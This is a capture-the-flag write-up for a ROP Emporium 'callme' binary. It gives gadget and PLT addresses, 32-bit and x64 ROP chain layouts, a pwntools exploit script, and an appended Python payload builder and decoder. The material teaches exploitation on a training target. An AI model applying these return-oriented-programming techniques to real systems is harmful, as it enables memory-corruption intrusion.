So we have all three required function calls, but in reverse order and with different parameters, so calling this function as-is won't get us the flag we are looking for. What we do have are the function calls available to us in the PLT, which is good.
So we'll have to build a ROP chain that calls these three functions in the right order (one, two, three) and with the right parameters (1, 2, 3).
32 bit
So we have the PLT addresses available for the three function calls.
So now we have to find a way to jump past the 3 parameters and call the next function once the first function has finished executing. In this case I found a ROP gadget that pops three values from the stack into three different registers and then returns back into the stack:
0x080488a9: pop esi ; pop edi ; pop ebp ; ret
So now our exploit will look something like this:
JUNK + call_one + ROP_GADGET + 1 + 2 + 3 + call_two + (repeat the gadget and the three arguments for call_three)
So let's construct the exploit and get our flag. Note:
Because of the change in how parameters are passed on x64 systems, we'll have to alter our exploit generation process. Now our exploit will look something like this.
On x64 the first integer parameters are passed in registers, in this order: RDI, RSI, RDX, and so on. We were able to find a gadget that does exactly that:
0x0000000000401ab0: pop rdi ; pop rsi ; pop rdx ; ret
And the PLT addresses for the functions were available from the disassembly of usefulFunction:
0x401850 - ONE
0x401870 - TWO
0x401810 - THREE
So now let's construct our final exploit and get the flag.
import sys
from pwn import *

offset = b"A" * 40  # padding up to the saved return address

# each unit: gadget (pop rdi ; pop rsi ; pop rdx ; ret), the three arguments, then the PLT entry
one   = p64(0x401ab0) + p64(1) + p64(2) + p64(3) + p64(0x401850)
two   = p64(0x401ab0) + p64(1) + p64(2) + p64(3) + p64(0x401870)
three = p64(0x401ab0) + p64(1) + p64(2) + p64(3) + p64(0x401810)

# write raw bytes, not a str, so the payload is not mangled
sys.stdout.buffer.write(offset + one + two + three)
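The two layouts described above (32-bit: function, gadget, three stack arguments; x64: gadget, three register arguments, function) are worth seeing side by side, together with the reverse operation, which is what an analyst does when reading a captured payload: walk it word by word and recover which function is called with which arguments. The following is an added example, not code from the write-up; it uses only the standard library. The x64 gadget and PLT addresses are the ones quoted above; the 32-bit PLT addresses are obviously fake placeholders, since the write-up does not list them, and the function names and helpers are my own.

```python
import struct
import sys

# Values quoted in the write-up for the x64 binary (ROP Emporium callme).
X64_GADGET = 0x401ab0  # pop rdi ; pop rsi ; pop rdx ; ret
X64_PLT = {"callme_one": 0x401850, "callme_two": 0x401870, "callme_three": 0x401810}
X64_PADDING = 40       # bytes before the saved return address, per the write-up

# 32-bit gadget from the write-up; PLT addresses are PLACEHOLDERS (not on the page).
X86_GADGET = 0x080488a9  # pop esi ; pop edi ; pop ebp ; ret
X86_PLT_PLACEHOLDER = {"callme_one": 0x11111111, "callme_two": 0x22222222,
                       "callme_three": 0x33333333}

ORDER = ["callme_one", "callme_two", "callme_three"]
ARGS = (1, 2, 3)


def pack_word(value, bits):
    """Little-endian machine word, 8 bytes on x64 and 4 bytes on x86."""
    return struct.pack("<Q" if bits == 64 else "<I", value)


def build_chain(plt, order, gadget, args, bits, padding):
    """Build the padded payload for either calling convention.

    x64: gadget, arg1, arg2, arg3, func   (gadget loads RDI/RSI/RDX, then rets into func)
    x86: func, gadget, arg1, arg2, arg3   (func returns into gadget, which pops the three
         stack arguments out of the way and rets into whatever follows: the next func)
    """
    chain = b""
    for name in order:
        packed_args = b"".join(pack_word(a, bits) for a in args)
        if bits == 64:
            chain += pack_word(gadget, bits) + packed_args + pack_word(plt[name], bits)
        else:
            chain += pack_word(plt[name], bits) + pack_word(gadget, bits) + packed_args
    return b"A" * padding + chain


def unpack_words(data, bits):
    size = bits // 8
    fmt = "<Q" if bits == 64 else "<I"
    return [struct.unpack(fmt, data[i:i + size])[0]
            for i in range(0, len(data) - len(data) % size, size)]


def recover_calls(payload, padding, bits, gadget, plt):
    """Reverse of build_chain: list (function, args) pairs found in a payload.

    Words that do not fit either pattern are skipped, so stray padding or junk
    between units does not break the walk.
    """
    names = {addr: name for name, addr in plt.items()}
    words = unpack_words(payload[padding:], bits)
    calls, i = [], 0
    while i + 4 < len(words):
        if bits == 64 and words[i] == gadget and words[i + 4] in names:
            calls.append((names[words[i + 4]], tuple(words[i + 1:i + 4])))
        elif bits == 32 and words[i] in names and words[i + 1] == gadget:
            calls.append((names[words[i]], tuple(words[i + 2:i + 5])))
        else:
            i += 1
            continue
        i += 5
    return calls


def build_x64_demo():
    """Same bytes as the write-up's pwntools script, without pwntools."""
    return build_chain(X64_PLT, ORDER, X64_GADGET, ARGS, 64, X64_PADDING)


def build_x86_demo(padding=44):
    """32-bit layout with placeholder PLT addresses and an assumed padding size."""
    return build_chain(X86_PLT_PLACEHOLDER, ORDER, X86_GADGET, ARGS, 32, padding)


if __name__ == "__main__":
    payload = build_x64_demo()
    # Print the decoded call sequence to stderr, raw payload to stdout.
    for func, args in recover_calls(payload, X64_PADDING, 64, X64_GADGET, X64_PLT):
        print(f"{func}{args}", file=sys.stderr)
    sys.stdout.buffer.write(payload)
```

Running it prints the three recovered calls, in order, and writes exactly the bytes the write-up's script produces. The decoder only recognises the two patterns the write-up describes, which is deliberate: it documents what this particular chain looks like rather than trying to be a general ROP disassembler.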